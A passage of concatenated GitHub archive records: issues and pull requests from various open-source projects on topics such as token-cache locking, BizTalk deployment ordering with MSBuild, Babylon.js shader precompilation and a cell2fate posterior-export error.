"provenance": "gharchive-dolma-0000.json.gz:392",
"repo": "AzureAD/microsoft-authentication-extensions-for-dotnet",
"url": "https://github.com/AzureAD/microsoft-authentication-extensions-for-dotnet/pull/9"
}
|
gharchive/pull-request
|
Jpwilli/locking
Adds locking to cache operations
Reverts projects to .net4.5
Upgrades projects to netcoreapp2.1 (redundant with Mark's other PR)
Adds tests
using System;
please add license blurb
Refers to: src/Shared/CrossPlatLock.cs:1 in d756837.
using System;
license
Refers to: tests/Microsoft.Identity.Extensions.Msal.UnitTests/MockTokenCache.cs:1 in d756837.
|
2025-04-01T06:36:45.768096
| 2016-07-27T08:04:57
|
167794905
|
{
"authors": [
"Kammy6679",
"prvijay",
"raeitan"
],
"license": "mit",
"license_source": "bigquery",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:393",
"repo": "AzureAD/rms-sdk-for-cpp",
"url": "https://github.com/AzureAD/rms-sdk-for-cpp/issues/119"
}
|
gharchive/issue
|
Cannot open the PPDF file, which is protected by RMS Android SDK
1. Protect a PDF file to a PPDF file with the RMS Android SDK
2. Open this PPDF with the RMS Linux SDK
3. Get an error message: This version is not supported.
Checking the code, we found that the following function throws an exception:
ProtectedFileStream::Acquire
PS: Please use "catch (const rmscore::exceptions::RMSException& ex)" to get the exception
@prvijay, please take a look at this issue. Thank you.
@raeitan for investigation
Any update?
Hey,
I've updated the SDK to support pfile version 3 in the dev branch, please have a look and see if it's working for you.
I'll need to run more tests before merging into master.
Thank you for pointing to the issue.
|
2025-04-01T06:36:45.792245
| 2022-01-21T19:13:40
|
1110804368
|
{
"authors": [
"cppcooper"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:394",
"repo": "BCCF-UBCO-AD/Orthanc-TMI",
"url": "https://github.com/BCCF-UBCO-AD/Orthanc-TMI/pull/93"
}
|
gharchive/pull-request
|
Review of Develop
It's time to merge into master. All this code needs review.
I was thinking once every two weeks, but it doesn't really matter so long as master builds and works
|
2025-04-01T06:36:45.813974
| 2021-07-15T15:27:52
|
945506291
|
{
"authors": [
"BrianRamsay",
"tylerpar99"
],
"license": "BSD-3-Clause",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:395",
"repo": "BCStudentSoftwareDevTeam/celts",
"url": "https://github.com/BCStudentSoftwareDevTeam/celts/pull/47"
}
|
gharchive/pull-request
|
PR for Warning label track hours issue 45(This issue is based off of branch: track_volunteer_hours_issue42)
This PR fixes issue #45
Summary:
The issue asked that there be a way for an admin to tell whether a participant who has checked into or RSVP'd to an event has completed all prerequisites for the event, and to flag them if not. To achieve this, we queried the database and pushed onto a list all the eventIDs that were set as prerequisites to the program the participant is attending. We then queried the database using those eventIDs and pushed onto a list all the users who attended any of the prerequisite events. Using this list, we checked how many times a username appeared and required the user to appear as many times as the length of the eventIDs list. If the user met that count they stayed on the list; otherwise they were removed. After deleting duplicates, we passed the list to the HTML and used Jinja to flag any users who appear on the track hours page but are not on the list of eligible participants.
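As a rough illustration of that counting logic (the function and variable names below are hypothetical and not taken from the celts code base), the eligibility check boils down to something like:
# attendance_rows is an iterable of (username, event_id) pairs for the prerequisite events
def eligible_participants(prereq_event_ids, attendance_rows):
    required = set(prereq_event_ids)
    attended = {}
    for username, event_id in attendance_rows:
        if event_id in required:
            attended.setdefault(username, set()).add(event_id)
    # A user is eligible only if they attended every prerequisite event
    return {user for user, events in attended.items() if events == required}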
To Test:
There is a test function in the test suite labeled test_warning.py. Running this should pass.
You can also visit the URL: http://<YOURIP>/<PROGRAMID>/<EVENTID>/track_hours. This URL will display a table with every user set to attend or currently at the event; if any of them have not met the requirements for the event you will see a red warning icon. Hovering over this will display a tooltip that tells you that the user has not completed the prerequisites.
Notes: This branch is forked off of the branch listed in the title. If any changes are made to the listed branch this will have to be updated.
There are conflicts to resolve
|
2025-04-01T06:36:45.820411
| 2017-05-12T23:48:11
|
228432579
|
{
"authors": [
"alex-hancock"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:396",
"repo": "BD2KGenomics/dcc-dashboard",
"url": "https://github.com/BD2KGenomics/dcc-dashboard/issues/22"
}
|
gharchive/issue
|
Display start time and last updated in action service table
See description. Opening branch feature/display-time to address.
@wshands Should I change out attributes for the timestamps, or should I just add two more columns?
Attributes added, columns rearranged to resemble file browser order per request of klearned. Current debate: leave all eleven columns, remove other items, or consolidate information?
|
2025-04-01T06:36:45.822007
| 2017-05-08T20:57:35
|
227172261
|
{
"authors": [
"arkal",
"cket",
"ejacox"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:397",
"repo": "BD2KGenomics/toil",
"url": "https://github.com/BD2KGenomics/toil/pull/1669"
}
|
gharchive/pull-request
|
Use chunked transfer in AWS job store importing
Resolves #1515
@cket i tested this branch and it still raised the [Errno 104] Connection reset by peer Exception
Thanks @arkal for testing these changes as well!
The 10 Gb import/export test was removed and will be added as an issue.
|
2025-04-01T06:36:45.964517
| 2020-08-28T10:53:48
|
687990276
|
{
"authors": [
"iamrajiv"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:398",
"repo": "BITSoC/EmotionRecog",
"url": "https://github.com/BITSoC/EmotionRecog/pull/24"
}
|
gharchive/pull-request
|
added black and flake8 linters
The black code formatter in Python is an opinionated tool that formats your code in the best way possible, and Flake8 is a powerful tool that checks our code's compliance with PEP8. This will format and enhance the code quality whenever there is a PR in the repository or any changes are made to a .py file.
Fixes: #22
@RC99 I am participating through BITSoC. Please review.
|
2025-04-01T06:36:46.029086
| 2017-11-06T06:14:05
|
271369241
|
{
"authors": [
"tfabraham"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:400",
"repo": "BTDF/DeploymentFramework",
"url": "https://github.com/BTDF/DeploymentFramework/issues/90"
}
|
gharchive/issue
|
ItemGroupFromSeparatedList build task should accept an empty string and return an empty ItemGroup
ItemGroupFromSeparatedList build task should accept an empty string and return an empty ItemGroup
This work item was migrated from CodePlex
CodePlex work item ID: '6054'
Assigned to: 'tfabraham'
Vote count: '0'
[UnknownUser@2/18/2010]
Resolved with changeset 36776.
[UnknownUser@2/21/2013]
[UnknownUser@5/16/2013]
|
2025-04-01T06:36:46.045119
| 2017-11-06T06:25:00
|
271370907
|
{
"authors": [
"tfabraham"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:401",
"repo": "BTDF/DeploymentFramework",
"url": "https://github.com/BTDF/DeploymentFramework/issues/98"
}
|
gharchive/issue
|
Feature: Add Knowledge of Inter-Application Dependency Stack
If application B relies on A, B has to be undeployed to redeploy A (for example B uses schemas contained in A). It would really be cool if this "stack" could be defined in BTDF. So if I'm fixing something in project A, B has to be undeployed, A has to be redeployed, then B has to be redployed. This would be a feature only for the development environment.
For the QA/production environment MSI install, a super-deploy of multiple MSI's in the proper order would also be very nice. Most applications that I've worked with are 5 to 25 inter-related applications with dependencies. BTDF still is very helpful. At one client, we had a spreadsheet of about 25 BT applications to deploy, and the proper order. There was still a large chance that the admins would mess up the deploy if they were not careful.
This work item was migrated from CodePlex
CodePlex work item ID: '6130'
Vote count: '5'
[giuliov@3/9/2010]
I addressed this with a Powershell deploy script that works at a higher-level, and I think that is a more generic approach: in my script I take care of other pieces outside the BTS applications.
[tfabraham@3/9/2010]
I also believe that this belongs in a layer that exists above the individual solutions that use the Deployment Framework. A meta-script that understands the dependencies and drives all of the individual solution deploy/undeploy cycles across multiple servers. I do think that such a script can become part of the Deployment Framework package, just not a "core" component of the Framework itself.
[UnknownUser@3/11/2010]
[Rokhead@3/11/2010]
I could see where this would be useful. Right now, it is a matter of the developer just "knowing" the stack, i.e. Install A, then B, then C. Uninstall in reverse, C then B, then A.
[UnknownUser@5/18/2010]
[UnknownUser@6/7/2011]
[fkuiper@8/26/2011]
I've written a MsBuild script that does exactly what is in the description. It utilizes the targets' 'DependsOn' attributes to maintain the stack, so I've created a target for each package. Well, actually I've created three targets for each package: PackageA, PackageA_Remove and PackageA_Add. The first target is dependent on the last two:
PackageA --> dependson="PackageA_Remove;PackageA_Add"
If you add PackageB that relies on PackageA you also create the same three targets, but now you add two extra target dependencies:
PackageA_Remove --> dependson="PackageB_Remove"
PackageB_Add --> dependson="PackageA_Add"
The cool thing is that you now let MsBuild figure out in which order your packages need to be undeployed and deployed. If you have a stack of 25 packages and you need to add a new one you don't have to rearrange your whole script (as we used to do) but let MsBuild figure it out at run time... as long as you have your dependencies in place.
[UnknownUser@10/20/2011]
[charliemott@11/14/2012]
This functionality will be provided within the BizTalk Administration Console in BizTalk 2013. See here: http://adventuresinsidethemessagebox.wordpress.com/2012/11/07/biztalk-2013-beta-new-features-dependency-modelling-in-the-administration-console/
[UnknownUser@2/21/2013]
[sandernefs@5/10/2013]
Hi Ferdinand,
I believe you mean that you use MSBuild to figure out the dependencies and that you only need some sort of 'config' file, which would make life a lot easier.
Are you willing to share this script here as well?
Regards,
Sander
[fkuiper@5/17/2013]
Hi Sander,
I unfortunately can't share the entire script here (there is too much business information in it), but I can share some highlights :)
What I've done is I've written an MSBuild target file containing 4 targets:
Install feature
Deploy feature
Uninstall feature
Undeploy feature
(a feature in this context is one BTDF-msi by the way)
The install feature target looks something like this:
<Target Name="InstallFeature">
<Message Text="Installing '$(FeatureName)'..." />
<!-- Install and copy MSI to install dir -->
<Exec Command="msiexec /i "$(FeatureName)-1.0.0.msi" /passive" WorkingDirectory="..\Packages" />
<CreateItem Include="..\Packages\$(FeatureName)-1.0.0.msi">
<Output ItemName="MsiToCopy" TaskParameter="Include" />
</CreateItem>
<Copy SourceFiles="@(MsiToCopy)" DestinationFiles="@(MsiToCopy->'c:\Program Files (x86)\$(FeatureName) for BizTalk\%(FileName)%(Extension)')" />
</Target>
And the Deploy feature something like this:
<Target Name="DeployFeature">
<!-- Start deployment -->
<Exec
Command=".\Framework\DeployTools\EnvironmentSettingsExporter.exe EnvironmentSettings\SettingsFileGenerator.xml EnvironmentSettings"
WorkingDirectory="c:\Program Files (x86)\$(FeatureName) for BizTalk\1.0\Deployment\"
Condition="Exists('c:\Program Files (x86)\$(FeatureName) for BizTalk\1.0\Deployment\EnvironmentSettings\SettingsFileGenerator.xml')"
/>
<MsBuild
Projects="c:\Program Files (x86)\$(FeatureName) for BizTalk\1.0\Deployment\$(FeatureName).Deployment.btdfproj"
Properties="DeployBizTalkMgmtDB=$(BT_DEPLOY_MGMT_DB);Configuration=Server;SkipUndeploy=true;ENV_SETTINGS=c:\Program Files (x86)\$(FeatureName) for BizTalk\1.0\Deployment\$(ENV_SETTINGS_MASK)"
/>
</Target>
Uninstall and undeploy are very simular in setup.
Of course these targets in themselves will not do anything. There are more scripts. One is the 'main' project file which will import all 'features' and contains the main targets 'Deploy' and 'Undeploy':
<Import Project="Deployment.Targets" />
<Import Project="Feature.ApplicationA.config" />
<Import Project="Feature.ApplicationB.config" />
<!-- Deploy all packages -->
<Target Name="Deploy">
<CallTarget Targets="@(BizTalkApplication->'%(Identity)_Add')" />
</Target>
<!-- Undeploy all packages -->
<Target Name="Undeploy">
<CallTarget Targets="@(BizTalkApplication->'%(Identity)_Remove')" />
</Target>
Last but not least there are the "feature configs" and that's where most of the magic happens:
<ItemGroup>
<BizTalkApplication Include="ApplicationA"/>
</ItemGroup>
<Target Name="ApplicationA_Add" DependsOnTargets="">
<MsBuild
Projects="$(MSBuildProjectFile)"
Targets="InstallFeature"
Properties="FeatureName=ApplicationA"
/>
<MsBuild
Projects="$(MSBuildProjectFile)"
Targets="DeployFeature"
Properties="FeatureName=ApplicationA"
/>
</Target>
<Target Name="ApplicationA_Remove" DependsOnTargets="">
<MsBuild
Projects="$(MSBuildProjectFile)"
Targets="UndeployFeature"
Properties="FeatureName=ApplicationA"
/>
<MsBuild
Projects="$(MSBuildProjectFile)"
Targets="UninstallFeature"
Properties="FeatureName=ApplicationA"
/>
</Target>
The config for feature B contains exactly the same as the above, but ofcourse you have to replace ApplicationA with ApplicationB. When you start the main msbuild file and call target "Deploy" all the features are installed and deployed and removed in sequence. Now for the magic to happen you can use the "DependsOn" attribute for the "ApplicationA_Add" target like this:
<Target Name="ApplicationA_Add" DependsOnTargets="ApplicationB_Add">
...
</Target>
Of course you have to add the same dependency to feature B when removing it, like this:
<Target Name="ApplicationB_Remove" DependsOnTargets="ApplicationA_Remove">
...
</Target>
With this setting ApplicationB will always be installed and deployed BEFORE ApplicationA, and ApplicationA will always be removed BEFORE ApplicationB.
And that's how I've solved the dependency tree problem for our 27 (or so) individual BTDF MSIs.
Hope this will be helpful to you.
Kind Regards,
Ferdinand.
[UnknownUser@10/14/2013]
|
2025-04-01T06:36:46.052772
| 2021-09-13T05:56:45
|
994484487
|
{
"authors": [
"cwfitzgerald"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:402",
"repo": "BVE-Reborn/rend3",
"url": "https://github.com/BVE-Reborn/rend3/issues/188"
}
|
gharchive/issue
|
Ambient Lighting Support Removed
Was erroneously removed during the renderlist rewrite, needs to be part of the pbr render list.
@JohnNagle Published in rend3-pbr 0.1.1
|
2025-04-01T06:36:46.072801
| 2023-07-05T21:46:01
|
1790397403
|
{
"authors": [
"J-Ogden99",
"msouff"
],
"license": "BSD-3-Clause",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:403",
"repo": "BYU-Hydroinformatics/geoglows-rest-api",
"url": "https://github.com/BYU-Hydroinformatics/geoglows-rest-api/pull/18"
}
|
gharchive/pull-request
|
Add CloudWatch Logging
Added a function that will write a log containing information about query parameters to AWS CloudWatch. Requires an AWS client to be present in the environment that can be accessed with boto3, as well as environment variables AWS_LOG_GROUP_NAME and AWS_LOG_STREAM_NAME. The values I have been using for these are 'data-service-queries-group' and 'data-service-queries-stream', respectively, but something like 'geoglows-service-queries-*' may be more appropriate; that is open for discussion.
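For context, a minimal sketch of what such a logging helper could look like with boto3; the function name and message format are illustrative, and the log group/stream are assumed to already exist:
import os
import time
import boto3

logs = boto3.client("logs")

def log_query(message: str) -> None:
    # Append one record describing the query parameters to the configured stream
    logs.put_log_events(
        logGroupName=os.environ["AWS_LOG_GROUP_NAME"],
        logStreamName=os.environ["AWS_LOG_STREAM_NAME"],
        logEvents=[{"timestamp": int(time.time() * 1000), "message": message}],
    )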
@rileyhales @msouff
Hi @J-Ogden99
I'm merging your cloudwatch-logging branch directly into the branch I'm currently working on so I'll close this PR.
|
2025-04-01T06:36:46.075045
| 2021-01-04T23:35:16
|
778449775
|
{
"authors": [
"PolygonalSun",
"deltakosh"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:404",
"repo": "BabylonJS/Babylon.js",
"url": "https://github.com/BabylonJS/Babylon.js/issues/9738"
}
|
gharchive/issue
|
Add PS5 DualSense support to Babylon.js
Once the DualSense gamepad is fully supported by PC and web, support for it should be added to Babylon.js' input systems.
@PolygonalSun can we close it??
@PolygonalSun can we close it??
None of the work for this has been merged into master but if we're fine with adding it now, I can have a PR up with a day or so. It only required a new button enum, value in the DeviceType enum, and updated detection logic (one additional line of code?).
Yes let's do it!
|
2025-04-01T06:36:46.086120
| 2024-04-17T15:05:54
|
2248527097
|
{
"authors": [
"RaananW",
"bjsplat"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:405",
"repo": "BabylonJS/Babylon.js",
"url": "https://github.com/BabylonJS/Babylon.js/pull/14996"
}
|
gharchive/pull-request
|
Allow shader precompile by dividing effect and thinEngine
This PR presents a few changes to Effect and ThinEngine architecture to allow shader precompilation before an engine is constructed.
Using the following code will allow you to create a (WebGL) Pipeline context using an existing context. While this is running you can do any other async tasks, like loading the Engine and its dependencies.
Note - the shader is being cached, so it will not be recompiled even if Babylon requests it. The important part is maintaining the generated shader name so that when an effect is created based on the shader code it will take the compiled shader from cache.
This code will precompile a provided shader:
import { generatePipelineContext } from <EMAIL_ADDRESS>
import { _preparePipelineContext, _stateObject, createPipelineContext } from <EMAIL_ADDRESS>
export async function compileShader(
id: string,
context: WebGL2RenderingContext | WebGLRenderingContext,
options: {
vertex: string;
fragment: string;
},
): Promise<void> {
await generatePipelineContext(
{
shaderNameOrContent: {
vertexSource: options.vertex,
fragmentSource: options.fragment,
},
key: id,
},
context,
createPipelineContext,
_preparePipelineContext,
);
}
Of course it can be a little more complex than that. It is technically possible to "serialize" existing shaders and then pre-load them. Having said that, precompiling the standard shader(s) might be a bit challenging, depending on many different factors.
Please make sure to label your PR with "bug", "new feature" or "breaking change" label(s).
To prevent this PR from going to the changelog marked it with the "skip changelog" label.
WebGL2 visualization test reporter:
https://babylonsnapshots.z22.web.core.windows.net/refs/pull/14996/merge/testResults/webgl2playwright/index.html
Visualization tests for WebGPU (Experimental)
Important - these might fail sporadically. This is an optional test.
https://babylonsnapshots.z22.web.core.windows.net/refs/pull/14996/merge/testResults/webgpuplaywright/index.html
Visualization tests for WebGL 1 have failed. If some tests failed because the snapshots do not match, the report can be found at
https://babylonsnapshots.z22.web.core.windows.net/refs/pull/14996/merge/testResults/webgl1/index.html
If tests were successful afterwards, this report might not be available anymore.
LGTM, I think the only issue is the activeRequests that should stay attached to one engine and therefore not set in PreCompile case
Moved activeRequests back to the engine. If someone uses the .functions function they will need to deal with disposing of the requests themselves.
Discussed with @sebavan , merging this (dismissing his review)
|
2025-04-01T06:36:46.115243
| 2018-05-16T12:09:48
|
323592664
|
{
"authors": [
"Bajdzis",
"mleopold"
],
"license": "mit",
"license_source": "bigquery",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:406",
"repo": "Bajdzis/vscode-database",
"url": "https://github.com/Bajdzis/vscode-database/issues/47"
}
|
gharchive/issue
|
FR: SSL authentication (mysql)
Hi,
I would like to propose support for authenticating via ssl (corresponding to the following command line arguments of the mysql client: --ssl-ca --ssl-cert --ssl-key).
Martin
I think the feature is included in version 2.0.1. Could you check if everything works?
@mleopold
|
2025-04-01T06:36:46.120853
| 2023-01-07T20:40:12
|
1524135710
|
{
"authors": [
"Bam92",
"martinyis"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:407",
"repo": "Bam92/attendancy-gda",
"url": "https://github.com/Bam92/attendancy-gda/issues/102"
}
|
gharchive/issue
|
Validate user input with express-validator or joi
https://developer.mozilla.org/en-US/docs/Learn/Server-side/Express_Nodejs/forms
I would like to try to solve this issue, but could you tell me which form you need to validate (file path)?
Hello @martinyis,
Thank you for your interest in this issue. The idea here is to validate user inputs in general. E.g.: login, add user... You can find forms in the views directory. You can also find the corresponding controllers in the controller folder.
Are you able to set up the project?
My preference is express-validator, but feel free to choose what you want https://www.freecodecamp.org/news/how-to-choose-which-validator-to-use-a-comparison-between-joi-express-validator-ac0b910c1a8c/
|
2025-04-01T06:36:46.128278
| 2024-02-28T14:20:58
|
2159083133
|
{
"authors": [
"mmills6060"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:408",
"repo": "Banbury-inc/Athena",
"url": "https://github.com/Banbury-inc/Athena/issues/12"
}
|
gharchive/issue
|
allow ability to upload files
need to be able to press the upload button and have it do something
completed
|
2025-04-01T06:36:46.155011
| 2020-04-08T18:26:29
|
596771555
|
{
"authors": [
"coacoas",
"isomarcte"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:409",
"repo": "Banno/kafka4s",
"url": "https://github.com/Banno/kafka4s/pull/179"
}
|
gharchive/pull-request
|
Update Threading Semantics
This commit makes a few changes related to the threading setup in ConsumerApi and ProducerApi.
It addresses unclean shutdown of the java.util.concurrent.ExecutorService as well as fixing a potential deadlock scenario.
Prior to this commit an ExecutorService with a single thread was created in ConsumerApi.BlockingContext. For blocking IO operations an unbounded thread pool is recommended (https://typelevel.org/cats-effect/concurrency/basics.html#choosing-thread-pool). Preventing unbounded resource usage is the responsibility of calling code running on a bounded thread pool.
This commit also updates the ThreadFactory so that if multiple pools happen to be created, they will be given globally unique names.
Two new methods are added to the companion object of ConsumerApi to allow the caller to provide their own Blocker if so desired.
Also, the shutdown of the thread pool prior to this commit only called (es: ExecutorService).shutdown(). This is not sufficient to shut down an ExecutorService. The full process is actually quite involved (https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/util/concurrent/ExecutorService.html). Thankfully cats-effect already provides this logic for us out of the box with Blocker.fromExecutorService.
Both the single threaded nature of the blocker and the shutdown semantics were issues. The impetus for this commit is that we were experiencing a deadlock around shutdown/restart of a fs2.Stream with Kafka4s related code. I strongly believe that one or both of these is the source of that issue, however even if it is not, these items should still be addressed.
This is a binary incompatible change.
@isomarcte Build failed:
The command "sbt ++$TRAVIS_SCALA_VERSION "scalafmtSbtCheck;scalafmtCheckAll"" exited with 1.
@isomarcte Is this still under development? There is now a conflict if we are still looking at this.
I think we are considering other approaches now. So I'll close this.
|
2025-04-01T06:36:46.185538
| 2024-03-25T13:56:08
|
2205826478
|
{
"authors": [
"Baroshem",
"danielroe"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:414",
"repo": "Baroshem/nuxt-security",
"url": "https://github.com/Baroshem/nuxt-security/pull/406"
}
|
gharchive/pull-request
|
fix: opt in to import.meta.* properties
Types of changes
[x] Bug fix (a non-breaking change which fixes an issue)
[ ] New feature (a non-breaking change which adds functionality)
[ ] Breaking change (fix or feature that would cause existing functionality to change)
Description
This is a very early PR to make this module compatible with changes we expect to release in Nuxt v5.
In Nuxt v3.7.0 we added support for import.meta.* (see original PR) and we've been gradually updating docs and moving across from the old process.* patterned variables.
As I'm sure you're aware, these variables are replaced at build-time and enable tree-shaking in bundled code.
This change affects runtime code (that is, code that is processed by the Nuxt bundler, like vite or webpack) rather than code running in Node. So it really doesn't matter what the string is, but it makes more sense in an ESM world to use import.meta rather than process.
(It might be worth updating the module compatibility as well to indicate it needs to have Nuxt v3.7.0+, but I'll leave that with you if you think this is a good approach.)
Checklist:
[ ] My change requires a change to the documentation.
[ ] I have updated the documentation accordingly.
[ ] I have added tests to cover my changes (if not applicable, please state why)
Hey @danielroe
Thank you so much for this PR! I will merge it alongside other features and fixes for the 1.3.0 version ;)
|
2025-04-01T06:36:46.313476
| 2021-03-12T03:23:41
|
829721424
|
{
"authors": [
"Barsik008",
"ManobsTheChobs"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:415",
"repo": "Barsik008/PossumBot",
"url": "https://github.com/Barsik008/PossumBot/issues/98"
}
|
gharchive/issue
|
!myakish doesn't work
When I type in !myakish it doesn't kick anyone out
@ManobsTheChobs it's supposed to give you admin perms.
|
2025-04-01T06:36:46.327582
| 2024-11-05T23:16:50
|
2636691494
|
{
"authors": [
"DataM0del"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:416",
"repo": "BasedInc/libhat",
"url": "https://github.com/BasedInc/libhat/issues/24"
}
|
gharchive/issue
|
Rust bindings
Just use rust-lang/rust-bindgen?
Also, Rust rewrite when??? (not happening lol but yes)
I'm doing this.
|
2025-04-01T06:36:46.405558
| 2021-01-11T20:44:06
|
783690866
|
{
"authors": [
"NoahGorny",
"marcospereira"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:417",
"repo": "Bash-it/bash-it",
"url": "https://github.com/Bash-it/bash-it/pull/1785"
}
|
gharchive/pull-request
|
Add themes/base.theme.bash to clean files
Description
Review with ?w=1.
Add themes/base.theme.bash to clean files
Run code formatter for themes/base.theme.bash
Fix shellcheck warnings for themes/base.theme.bash
Fix shellcheck header script to consider multiple lines
Motivation and Context
I've picked this file because it is the file with the most changes (commits, at least) based on:
git log --name-only --pretty="format:" | grep -v -e "^[[:space:]]*$" | sort | uniq -c | sort
I thought about adding other files, but that would probably make it harder to review.
How Has This Been Tested?
Besides running the bats tests locally, I've manually tested the most significant changes in isolation (checking they result in the same effect as before).
Screenshots (if appropriate):
Types of changes
[ ] Bug fix (non-breaking change which fixes an issue)
[ ] New feature (non-breaking change which adds functionality)
[ ] Breaking change (fix or feature that would cause existing functionality to change)
[ ] File linting
Checklist:
[x] My code follows the code style of this project.
[x] If my change requires a change to the documentation, I have updated the documentation accordingly.
[x] I have read the CONTRIBUTING document.
[x] If I have added a new file, I also added it to clean_files.txt and formatted it using lint_clean_files.sh.
[x] I have added tests to cover my changes, and all the new and existing tests pass.
Thanks for reviewing, @NoahGorny and @davidpfarrell. I've removed the changes in dots-bash.sh.
Thanks, @NoahGorny. So, I can invest some more time in this cleanup task, but perhaps just prioritizing files that have many changes isn't the best way to do it, right?
Are there any specific areas where you think it would be more relevant now?
I think that going after the core files, like the file you fixed here, is a great idea. Just make sure there are no pending PRs for the file, and lint away :smile:
For hints, I think bash_it.sh is a challenging file worth cleaning up, also the lib directory contains important files.
Thank you for doing this @marcospereira !
|
2025-04-01T06:36:46.410443
| 2024-06-24T14:44:44
|
2370442035
|
{
"authors": [
"armsteadj1",
"bt-platform-eng"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:418",
"repo": "Basis-Theory/developers.basistheory.com",
"url": "https://github.com/Basis-Theory/developers.basistheory.com/pull/403"
}
|
gharchive/pull-request
|
fix: adding information about delay in tokens in list and search
Description
Documenting the slight delay in token availability in listing and search
Testing required outside of automated testing?
[ ] Not Applicable
Screenshots (if appropriate):
[ ] Not Applicable
Rollback / Rollforward Procedure
[ ] Roll Forward
[ ] Roll Back
Reviewer Checklist
[ ] Description of Change
[ ] Description of outside testing if applicable.
[ ] Description of Roll Forward / Backward Procedure
[ ] Documentation updated for Change
:tada: This PR is included in version 1.160.1 :tada:
The release is available on GitHub release
Your semantic-release bot :package::rocket:
|
2025-04-01T06:36:46.413027
| 2018-11-14T11:25:58
|
380654663
|
{
"authors": [
"BastiaanOlij"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:419",
"repo": "BastiaanOlij/gdprocmesh",
"url": "https://github.com/BastiaanOlij/gdprocmesh/pull/25"
}
|
gharchive/pull-request
|
Adding Fast Quadric Mesh Simplification support
Working on implementing this really cool piece of tech:
https://github.com/sp4cerat/Fast-Quadric-Mesh-Simplification
This takes in a mesh, optimizes the vertices and faces to a reduction factor and gives you a resulting mesh.
Note that due to the way meshes are loaded into Godot, multi-material meshes will always have seam issues. But in combination with game optimization that turns a mesh into a single-material mesh with all textures baked into one, this will be a powerful automatic LOD tool.
Lots of work left to be done. Need to remove duplicate vertices to solve seam issues. Have to add texture coordinates, etc.
UVs and seams work fine now, last thing to do is normals :)
OK, I have normals and tangents working, though tangents seem inverted somehow (or maybe they are wrong on the source object). I think it's time to merge this
|
2025-04-01T06:36:46.458464
| 2023-09-07T07:22:58
|
1885271953
|
{
"authors": [
"joaoufrj",
"sezginerr"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:420",
"repo": "BayraktarLab/cell2fate",
"url": "https://github.com/BayraktarLab/cell2fate/issues/7"
}
|
gharchive/issue
|
Can't export the model posterior to the anndata object
Hi,
I am running cell2fate on an M1 MBP and, as you know, NVIDIA GPUs and CUDA with PyTorch will not work on ARM Macs. I can train the model [mod.train()]; the following message appears:
GPU available: False, used: False
TPU available: False, using: 0 TPU cores
IPU available: False, using: 0 IPUs
But when I export the model posterior to the anndata object with adata = mod.export_posterior(adata), I get the following issue:
AssertionError Traceback (most recent call last)
Cell In[17], line 1
----> 1 adata = mod.export_posterior(adata)
File ~/opt/anaconda3/envs/cell2fate_env/lib/python3.9/site-packages/cell2fate/_cell2fate_DynamicalModel.py:290, in Cell2fate_DynamicalModel.export_posterior(self, adata, sample_kwargs, export_slot, full_velocity_posterior, normalize)
286 sample_kwargs['batch_size'] = adata.n_obs
288 # generate samples from posterior distributions for all parameters
289 # and compute mean, 5%/95% quantiles and standard deviation
--> 290 self.samples = self.sample_posterior(**sample_kwargs)
292 # export posterior distribution summary for all parameters and
293 # annotation (model, date, var, obs and cell type names) to anndata object
294 adata.uns[export_slot] = self._export2adata(self.samples)
File ~/opt/anaconda3/envs/cell2fate_env/lib/python3.9/site-packages/scvi/model/base/_pyromixin.py:483, in PyroSampleMixin.sample_posterior(self, num_samples, return_sites, use_gpu, batch_size, return_observed, return_samples, summary_fun)
436 """
437 Summarise posterior distribution.
438
(...)
480 to keep all model-specific variables in one place.
481 """
482 # sample using minibatches (if full data, data is moved to GPU only once anyway)
--> 483 samples = self._posterior_samples_minibatch(
484 use_gpu=use_gpu,
485 batch_size=batch_size,
486 num_samples=num_samples,
487 return_sites=return_sites,
488 return_observed=return_observed,
489 )
491 param_names = list(samples.keys())
492 results = dict()
File ~/opt/anaconda3/envs/cell2fate_env/lib/python3.9/site-packages/cell2fate/_cell2fate_DynamicalModel.py:796, in Cell2fate_DynamicalModel._posterior_samples_minibatch(self, use_gpu, batch_size, **sample_kwargs)
779 """
780 Temporary solution for batch sampling problem.
781
(...)
792 dictionary {variable_name: [array with samples in 0 dimension]}
793 """
794 samples = dict()
